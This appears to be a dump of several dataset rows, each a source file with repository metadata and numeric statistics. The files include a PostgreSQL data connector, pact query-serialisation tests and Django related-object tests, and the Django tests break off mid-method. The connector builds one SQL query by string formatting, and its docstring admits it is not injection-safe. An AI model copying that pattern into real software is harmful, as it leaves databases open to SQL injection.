| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6f4a672aed74a62d795176e918183f713024cda5
| 85
|
py
|
Python
|
web_app/vis_comm/routes/python_scripts/server.py
|
RapidsAtHKUST/FYP16-CommunityDetectionVis
|
4b7c76f6f8f94d09ae4ab98262b894dfd6af3bc0
|
[
"MIT"
] | null | null | null |
web_app/vis_comm/routes/python_scripts/server.py
|
RapidsAtHKUST/FYP16-CommunityDetectionVis
|
4b7c76f6f8f94d09ae4ab98262b894dfd6af3bc0
|
[
"MIT"
] | null | null | null |
web_app/vis_comm/routes/python_scripts/server.py
|
RapidsAtHKUST/FYP16-CommunityDetectionVis
|
4b7c76f6f8f94d09ae4ab98262b894dfd6af3bc0
|
[
"MIT"
] | 1
|
2021-12-02T10:34:23.000Z
|
2021-12-02T10:34:23.000Z
|
import os
os.system("cd ../community_detection_algos/docker;python run_docker.py;")
| 21.25
| 73
| 0.788235
| 13
| 85
| 4.923077
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070588
| 85
| 3
| 74
| 28.333333
| 0.810127
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6f59ca49ca0477b4268f8d9bcb4231899e51d939
| 13,586
|
py
|
Python
|
db/dbutil/db_queries_bloomberg.py
|
kaljuvee/openaltdata
|
9c5d140b56cfd5260fe3cf52b24bb7d467e87cf1
|
[
"MIT"
] | null | null | null |
db/dbutil/db_queries_bloomberg.py
|
kaljuvee/openaltdata
|
9c5d140b56cfd5260fe3cf52b24bb7d467e87cf1
|
[
"MIT"
] | null | null | null |
db/dbutil/db_queries_bloomberg.py
|
kaljuvee/openaltdata
|
9c5d140b56cfd5260fe3cf52b24bb7d467e87cf1
|
[
"MIT"
] | 1
|
2021-09-10T16:03:20.000Z
|
2021-09-10T16:03:20.000Z
|
import db.db_access as access
import pandas as pd
import psycopg2
from sqlalchemy import create_engine
CONST_SQL_GET_COMP_NAME = 'SELECT * FROM maincompany;'
CONST_SQL_GET_REP_SALES = 'SELECT * FROM reported_sales;'
CONST_SQL_GET_DAILY_ESTIMATION = 'SELECT * FROM daily_sales_estimation;'
CONST_SQL_GET_DAILY_ESTIMATION_PER_MAIN_COMPANY_ID = 'SELECT * FROM daily_sales_estimation WHERE main_company_id = {MAIN_COMPANY_ID};'
CONST_SQL_GET_HIST_PRICES = 'SELECT * FROM historical_prices;'
INSERT_REPORTED_SALES = 'INSERT INTO reported_sales (main_company_id, quarter_group, end_quarter_date, start_quarter_date, filing_date, actual_sales, sales_reported, time_announcement) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)'
INSERT_DAILY_SALES_ESTIMATION = 'INSERT INTO daily_sales_estimation (main_company_id, quarter_group, year_estimation, quarter_estimation, datetime, estimation) VALUES (%s, %s, %s, %s, %s, %s)'
INSERT_HIST_PRICE = 'INSERT INTO historical_prices (main_company_id, date, close, high, low, open) VALUES (%s, %s, %s, %s, %s, %s)'
DELETE_DAILY_ESTIMATION_FUTURE = 'DELETE FROM daily_sales_estimation WHERE company_id = %s and quarter_group = %s;'
def first_column(array_2d):
return list(zip(*array_2d))[0]
def db_result_to_pandas(cursor_fetch_result):
return pd.DataFrame(cursor_fetch_result['result'], columns=cursor_fetch_result['header'])
class psql_bloomberg_pipeline_connector_db(object):
"""
Class for getting data from the database.
Currently not SQL injection safe.
"""
def __init__(self):
self.host, self.port, self.database, self.user, self.password = access.postgre_access_google_cloud()
self.message = str('postgres://' + self.user + ':' + self.password + '@' + self.host + ':' + self.port + '/' + self.database)
def get_psql_context(self):
cnx = psycopg2.connect(host=self.host, port=self.port, database=self.database, user=self.user, password=self.password)
return cnx
def get_create_engine(self):
engine = create_engine(self.message)
return engine
def get_companies_names(self):
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_COMP_NAME)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_reported_sales(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_REP_SALES)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_daily_sales_estimation(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_DAILY_ESTIMATION)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_daily_sales_estimation_per_main_company_id(self, main_company_id):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param main_company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
query = CONST_SQL_GET_DAILY_ESTIMATION_PER_MAIN_COMPANY_ID.format(MAIN_COMPANY_ID=str(main_company_id))
cur.execute(query)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_historical_prices(self):
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_HIST_PRICES)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def insert_reported_sales(self, df):
cnx = self.get_psql_context()
cursor = cnx.cursor()
try:
df = df[['main_company_id', 'group', 'end_quarter_date', 'start_quarter_date', 'filing_date', 'actual_sales', 'sales_reported', 'time']]
# change format for date and time to insert it in db
df['end_quarter_date'] = df['end_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['end_quarter_date']))
df['start_quarter_date'] = df['start_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['start_quarter_date']))
df['filing_date'] = df['filing_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['filing_date']))
cursor.executemany(INSERT_REPORTED_SALES, df.values.tolist())
cnx.commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
cursor.close()
cnx.close()
def insert_daily_estimation(self, df):
engine = self.get_create_engine()
try:
table_name = 'daily_sales_estimation'
df.to_sql(table_name, con=engine.connect(), if_exists='append', index=False, method='multi')
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def insert_historical_price(self, df):
cnx = self.get_psql_context()
cursor = cnx.cursor()
try:
df = df[['main_company_id', 'date', 'close', 'high', 'low', 'open']]
cursor.executemany(INSERT_HIST_PRICE, df.values.tolist())
cnx.commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
cursor.close()
cnx.close()
def delete_daily_estimation_quarter(self, df):
cnx = self.get_psql_context()
cursor = cnx.cursor()
try:
df = df[['main_company_id', 'quarter_group']]
cursor.executemany(DELETE_DAILY_ESTIMATION_FUTURE, df.values.tolist())
cnx.commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
cursor.close()
cnx.close()
'''
class TrafficDatabaseConnector(object):
"""
Class for getting data from the database.
Currently not SQL injection safe.
"""
def __init__(self):
server, database, username, password, driver = access.parameter()
self.cnx = mysql.connector.connect(user=username, password=password,
host=server,
database=database)
def get_mysql_context(self):
server, database, username, password, driver = access.parameter()
cnx = mysql.connector.connect(user=username, password=password,
host=server,
database=database)
return cnx
def get_companies_names(self):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(CONST_SQL_GET_COMP_NAME)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_companies_names_pandas(self):
return db_result_to_pandas(self.get_companies_names())
def get_reported_sales(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
sql_request = CONST_SQL_GET_REP_SALES
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_reported_sales_pandas(self):
return db_result_to_pandas(self.get_reported_sales())
def get_daily_sales_estimation(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
sql_request = CONST_SQL_GET_DAILY_ESTIMATION
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_daily_sales_estimation_pandas(self):
return db_result_to_pandas(self.get_daily_sales_estimation())
def get_historical_prices(self):
sql_request = CONST_SQL_GET_HIST_PRICES
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_historical_prices_pandas(self):
return db_result_to_pandas(self.get_historical_prices())
def insert_reported_sales(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'group', 'end_quarter_date', 'start_quarter_date', 'filing_date', 'actual_sales', 'sales_reported', 'time']]
# change format for date and time to insert it in db
df['end_quarter_date'] = df['end_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['end_quarter_date']))
df['start_quarter_date'] = df['start_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['start_quarter_date']))
df['filing_date'] = df['filing_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['filing_date']))
cursor.executemany(INSERT_REPORTED_SALES, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def insert_daily_estimation(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'quarter_group', 'year_estimation', 'quarter_estimation', 'datetime', 'estimation']]
cursor.executemany(INSERT_DAILY_SALES_ESTIMATION, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def insert_historical_price(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'date', 'close', 'high', 'low', 'open']]
cursor.executemany(INSERT_HIST_PRICE, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def delete_daily_estimation_quarter(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'quarter_group']]
cursor.executemany(DELETE_DAILY_ESTIMATION_FUTURE, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def _run_sql_query(self, sql_request):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def run_sql_query(self, sql_request):
return db_result_to_pandas(self._run_sql_query(sql_request))
def cache_db_request_pandas(db_request, pandas_filename):
try:
return pd.read_pickle(pandas_filename)
except Exception as e:
pandas_obj = db_request()
pandas_obj.to_pickle(pandas_filename)
return pandas_obj
'''
| 39.04023
| 226
| 0.60923
| 1,603
| 13,586
| 4.915783
| 0.101684
| 0.027411
| 0.021574
| 0.033503
| 0.81764
| 0.770939
| 0.760533
| 0.744416
| 0.714467
| 0.673858
| 0
| 0.001434
| 0.281319
| 13,586
| 347
| 227
| 39.152738
| 0.805612
| 0.052775
| 0
| 0.564516
| 0
| 0.024194
| 0.184742
| 0.018212
| 0
| 0
| 0
| 0
| 0
| 1
| 0.112903
| false
| 0.024194
| 0.032258
| 0.016129
| 0.225806
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48b508c562736975c3166e863ec74e8f5fbff2ce
| 2,110
|
py
|
Python
|
mexmi/models/imagenet/__init__.py
|
mexmi2021/mexmi-project
|
ef735cb290d33b326f592a70fa9b7f7dc6b6281b
|
[
"MIT"
] | null | null | null |
mexmi/models/imagenet/__init__.py
|
mexmi2021/mexmi-project
|
ef735cb290d33b326f592a70fa9b7f7dc6b6281b
|
[
"MIT"
] | null | null | null |
mexmi/models/imagenet/__init__.py
|
mexmi2021/mexmi-project
|
ef735cb290d33b326f592a70fa9b7f7dc6b6281b
|
[
"MIT"
] | null | null | null |
"""Fallback to Cadene imagenet models (superset of torchvision models)
Source: https://github.com/Cadene/pretrained-models.pytorch
"""
# from pretrainedmodels import fbresnet152
# from pretrainedmodels import cafferesnet101
# from pretrainedmodels import bninception
# from pretrainedmodels import resnext101_32x4d
# from pretrainedmodels import resnext101_64x4d
# from pretrainedmodels import inceptionv4
# from pretrainedmodels import inceptionresnetv2
# from pretrainedmodels import nasnetalarge
# from pretrainedmodels import nasnetamobile
# from pretrainedmodels import alexnet
# from pretrainedmodels import densenet121
# from pretrainedmodels import densenet169
# from pretrainedmodels import densenet201
# from pretrainedmodels import densenet161
# from pretrainedmodels import resnet18
# from pretrainedmodels import resnet34
# from pretrainedmodels import resnet50
# from pretrainedmodels import resnet101
# from pretrainedmodels import resnet152
# from pretrainedmodels import inceptionv3
# from pretrainedmodels import squeezenet1_0
# from pretrainedmodels import squeezenet1_1
# from pretrainedmodels import vgg11
# from pretrainedmodels import vgg11_bn
# from pretrainedmodels import vgg13
# from pretrainedmodels import vgg13_bn
# from pretrainedmodels import vgg16
# from pretrainedmodels import vgg16_bn
# from pretrainedmodels import vgg19_bn
# from pretrainedmodels import vgg19
# from pretrainedmodels import dpn68
# from pretrainedmodels import dpn68b
# from pretrainedmodels import dpn92
# from pretrainedmodels import dpn98
# from pretrainedmodels import dpn131
# from pretrainedmodels import dpn107
# from pretrainedmodels import xception
# from pretrainedmodels import senet154
# from pretrainedmodels import se_resnet50
# from pretrainedmodels import se_resnet101
# from pretrainedmodels import se_resnet152
# from pretrainedmodels import se_resnext50_32x4d
# from pretrainedmodels import se_resnext101_32x4d
# from pretrainedmodels import pnasnet5large
# from pretrainedmodels import polynet
from .bagnets import bagnet9
from .bagnets import bagnet17
from .bagnets import bagnet33
| 39.074074
| 70
| 0.850237
| 224
| 2,110
| 7.941964
| 0.276786
| 0.505902
| 0.657673
| 0.078696
| 0.083193
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057558
| 0.118957
| 2,110
| 53
| 71
| 39.811321
| 0.899408
| 0.9109
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
48e294b1fe59367798e4d57d915021b9365c453d
| 165
|
py
|
Python
|
pyfacebook/__init__.py
|
nedsons/python-facebook
|
bf2b4a70ef0e0a67a142f5856586ea318f9807ea
|
[
"Apache-2.0"
] | 2
|
2021-03-16T02:58:10.000Z
|
2021-03-16T16:53:23.000Z
|
pyfacebook/__init__.py
|
nedsons/python-facebook
|
bf2b4a70ef0e0a67a142f5856586ea318f9807ea
|
[
"Apache-2.0"
] | null | null | null |
pyfacebook/__init__.py
|
nedsons/python-facebook
|
bf2b4a70ef0e0a67a142f5856586ea318f9807ea
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
from __future__ import absolute_import
from .api import * # noqa
from .error import * # noqa
from .models import * # noqa
__version__ = "0.8.1"
| 16.5
| 38
| 0.69697
| 24
| 165
| 4.416667
| 0.583333
| 0.283019
| 0.264151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.2
| 165
| 9
| 39
| 18.333333
| 0.772727
| 0.163636
| 0
| 0
| 0
| 0
| 0.037594
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5b1046b957722acd447349d72ec0240db663d42a
| 323
|
py
|
Python
|
Validation/MtdValidation/python/MtdPostProcessor_cff.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 6
|
2017-09-08T14:12:56.000Z
|
2022-03-09T23:57:01.000Z
|
Validation/MtdValidation/python/MtdPostProcessor_cff.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 545
|
2017-09-19T17:10:19.000Z
|
2022-03-07T16:55:27.000Z
|
Validation/MtdValidation/python/MtdPostProcessor_cff.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 14
|
2017-10-04T09:47:21.000Z
|
2019-10-23T18:04:45.000Z
|
import FWCore.ParameterSet.Config as cms
from Validation.MtdValidation.btlSimHitsPostProcessor_cfi import btlSimHitsPostProcessor
from Validation.MtdValidation.MtdGlobalRecoPostProcessor_cfi import MtdGlobalRecoPostProcessor
mtdValidationPostProcessor = cms.Sequence(btlSimHitsPostProcessor + MtdGlobalRecoPostProcessor)
| 46.142857
| 95
| 0.907121
| 25
| 323
| 11.64
| 0.56
| 0.09622
| 0.185567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 323
| 6
| 96
| 53.833333
| 0.957237
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5b1e6edf7093f29b3f50623889ce5c7e3b6bf60b
| 26
|
py
|
Python
|
01_Hello/hello01_print.py
|
davidlg2005/tiny_python_projects
|
3f86615f32c10cb2e689ef4abc56c2c194063bfe
|
[
"MIT"
] | null | null | null |
01_Hello/hello01_print.py
|
davidlg2005/tiny_python_projects
|
3f86615f32c10cb2e689ef4abc56c2c194063bfe
|
[
"MIT"
] | null | null | null |
01_Hello/hello01_print.py
|
davidlg2005/tiny_python_projects
|
3f86615f32c10cb2e689ef4abc56c2c194063bfe
|
[
"MIT"
] | null | null | null |
print('01_Hello, World!')
| 13
| 25
| 0.692308
| 4
| 26
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.076923
| 26
| 1
| 26
| 26
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5b24270483e887d17caf80d4514db372746177ef
| 5,635
|
py
|
Python
|
pactman/test/pact_serialisation/test_request_query.py
|
AustralianSynchrotron/pactman
|
9e149e0b1da2dea2c58cfc7cab76f407ac03060e
|
[
"MIT"
] | null | null | null |
pactman/test/pact_serialisation/test_request_query.py
|
AustralianSynchrotron/pactman
|
9e149e0b1da2dea2c58cfc7cab76f407ac03060e
|
[
"MIT"
] | null | null | null |
pactman/test/pact_serialisation/test_request_query.py
|
AustralianSynchrotron/pactman
|
9e149e0b1da2dea2c58cfc7cab76f407ac03060e
|
[
"MIT"
] | null | null | null |
import pytest
from pactman import Consumer, Like, Provider, Term
from pactman.mock.request import Request
def test_v2():
pact = Consumer('consumer').has_pact_with(Provider('provider'), version='2.0.0')
pact.given("the condition exists").upon_receiving("a request") \
.with_request("GET", "/path", query="fields=first,second").will_respond_with(200, body='ok')
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerState': 'the condition exists',
'request': dict(method='GET', path='/path', query='fields=first,second'),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='2.0.0'))
}
@pytest.mark.parametrize('query_field', [
'first,second',
['first,second']
])
def test_v3(query_field):
pact = Consumer('consumer').has_pact_with(Provider('provider'), version='3.0.0')
pact.given([{'name': "the condition exists", 'params': {}}]).upon_receiving("a request") \
.with_request("GET", "/path", query=dict(fields=query_field)).will_respond_with(200, body='ok')
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerStates': [{'name': 'the condition exists', 'params': {}}],
'request': dict(method='GET', path='/path', query=dict(fields=['first,second'])),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='3.0.0'))
}
def test_like_v2():
pact = Consumer('consumer').has_pact_with(Provider('provider'), version='2.0.0')
pact.given("the condition exists").upon_receiving("a request") \
.with_request("GET", "/path", query=Like("fields=first,second")).will_respond_with(200, body='ok')
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerState': 'the condition exists',
'request': dict(method='GET', path='/path', query='fields=first,second',
matchingRules={'$.query': {'match': 'type'}}),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='2.0.0'))
}
def test_like_v3():
pact = (
Consumer('consumer').has_pact_with(Provider('provider'), version='3.0.0')
.given("the condition exists")
.upon_receiving("a request")
.with_request("GET", "/path", query=dict(fields=Like(['first,second'])))
.will_respond_with(200, body='ok')
)
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerStates': [{'name': 'the condition exists', 'params': {}}],
'request': dict(method='GET', path='/path', query=dict(fields=['first,second']),
matchingRules={'query': {'fields': {'matchers': [{'match': 'type'}]}}}),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='3.0.0'))
}
def test_broader_like_v3():
pact = (
Consumer('consumer').has_pact_with(Provider('provider'), version='3.0.0')
.given("the condition exists")
.upon_receiving("a request")
.with_request("GET", "/path", query=Like(dict(fields=['first,second'])))
.will_respond_with(200, body='ok')
)
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerStates': [{'name': 'the condition exists', 'params': {}}],
'request': dict(method='GET', path='/path', query=dict(fields=['first,second']),
matchingRules={'query': {'*': {'matchers': [{'match': 'type'}]}}}),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='3.0.0'))
}
def test_matcher_in_query():
target = Request('GET', '/test-path', query={'q': [Like('spam')], 'l': [Term(r'\d+', '10')]})
assert target.json('3.0.0') == {
'method': 'GET',
'path': '/test-path',
'query': {'q': ['spam'], 'l': ['10']},
'matchingRules': {
'query': {
'q': {
'matchers': [
{
'match': 'type'
},
]
},
'l': {
'matchers': [
{
'match': 'regex',
'regex': r'\d+',
}
]
},
}
}
}
| 35.440252
| 106
| 0.50417
| 533
| 5,635
| 5.227017
| 0.136961
| 0.038765
| 0.064609
| 0.021536
| 0.862527
| 0.842067
| 0.842067
| 0.842067
| 0.842067
| 0.842067
| 0
| 0.019688
| 0.305945
| 5,635
| 158
| 107
| 35.664557
| 0.692662
| 0
| 0
| 0.507463
| 0
| 0
| 0.252706
| 0
| 0
| 0
| 0
| 0
| 0.044776
| 1
| 0.044776
| false
| 0
| 0.022388
| 0
| 0.067164
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d28d266557dfae0ad30cdffb18d53783ca62a8c7
| 5,773
|
py
|
Python
|
tests/known_related_objects/tests.py
|
webjunkie/django
|
5dbca13f3baa2e1bafd77e84a80ad6d8a074712e
|
[
"BSD-3-Clause"
] | 790
|
2015-01-03T02:13:39.000Z
|
2020-05-10T19:53:57.000Z
|
AppServer/lib/django-1.5/tests/modeltests/known_related_objects/tests.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1,361
|
2015-01-08T23:09:40.000Z
|
2020-04-14T00:03:04.000Z
|
AppServer/lib/django-1.5/tests/modeltests/known_related_objects/tests.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 155
|
2015-01-08T22:59:31.000Z
|
2020-04-08T08:01:53.000Z
|
from __future__ import absolute_import
from django.test import TestCase
from .models import Tournament, Organiser, Pool, PoolStyle
class ExistingRelatedInstancesTests(TestCase):
fixtures = ['tournament.json']
def test_foreign_key(self):
with self.assertNumQueries(2):
tournament = Tournament.objects.get(pk=1)
pool = tournament.pool_set.all()[0]
self.assertIs(tournament, pool.tournament)
def test_foreign_key_prefetch_related(self):
with self.assertNumQueries(2):
tournament = (Tournament.objects.prefetch_related('pool_set').get(pk=1))
pool = tournament.pool_set.all()[0]
self.assertIs(tournament, pool.tournament)
def test_foreign_key_multiple_prefetch(self):
with self.assertNumQueries(2):
tournaments = list(Tournament.objects.prefetch_related('pool_set').order_by('pk'))
pool1 = tournaments[0].pool_set.all()[0]
self.assertIs(tournaments[0], pool1.tournament)
pool2 = tournaments[1].pool_set.all()[0]
self.assertIs(tournaments[1], pool2.tournament)
def test_queryset_or(self):
tournament_1 = Tournament.objects.get(pk=1)
tournament_2 = Tournament.objects.get(pk=2)
with self.assertNumQueries(1):
pools = tournament_1.pool_set.all() | tournament_2.pool_set.all()
related_objects = set(pool.tournament for pool in pools)
self.assertEqual(related_objects, set((tournament_1, tournament_2)))
def test_queryset_or_different_cached_items(self):
tournament = Tournament.objects.get(pk=1)
organiser = Organiser.objects.get(pk=1)
with self.assertNumQueries(1):
pools = tournament.pool_set.all() | organiser.pool_set.all()
first = pools.filter(pk=1)[0]
self.assertIs(first.tournament, tournament)
self.assertIs(first.organiser, organiser)
def test_queryset_or_only_one_with_precache(self):
tournament_1 = Tournament.objects.get(pk=1)
tournament_2 = Tournament.objects.get(pk=2)
# 2 queries here as pool id 3 has tournament 2, which is not cached
with self.assertNumQueries(2):
pools = tournament_1.pool_set.all() | Pool.objects.filter(pk=3)
related_objects = set(pool.tournament for pool in pools)
self.assertEqual(related_objects, set((tournament_1, tournament_2)))
# and the other direction
with self.assertNumQueries(2):
pools = Pool.objects.filter(pk=3) | tournament_1.pool_set.all()
related_objects = set(pool.tournament for pool in pools)
self.assertEqual(related_objects, set((tournament_1, tournament_2)))
def test_queryset_and(self):
tournament = Tournament.objects.get(pk=1)
organiser = Organiser.objects.get(pk=1)
with self.assertNumQueries(1):
pools = tournament.pool_set.all() & organiser.pool_set.all()
first = pools.filter(pk=1)[0]
self.assertIs(first.tournament, tournament)
self.assertIs(first.organiser, organiser)
def test_one_to_one(self):
with self.assertNumQueries(2):
style = PoolStyle.objects.get(pk=1)
pool = style.pool
self.assertIs(style, pool.poolstyle)
def test_one_to_one_select_related(self):
with self.assertNumQueries(1):
style = PoolStyle.objects.select_related('pool').get(pk=1)
pool = style.pool
self.assertIs(style, pool.poolstyle)
def test_one_to_one_multi_select_related(self):
with self.assertNumQueries(1):
poolstyles = list(PoolStyle.objects.select_related('pool').order_by('pk'))
self.assertIs(poolstyles[0], poolstyles[0].pool.poolstyle)
self.assertIs(poolstyles[1], poolstyles[1].pool.poolstyle)
def test_one_to_one_prefetch_related(self):
with self.assertNumQueries(2):
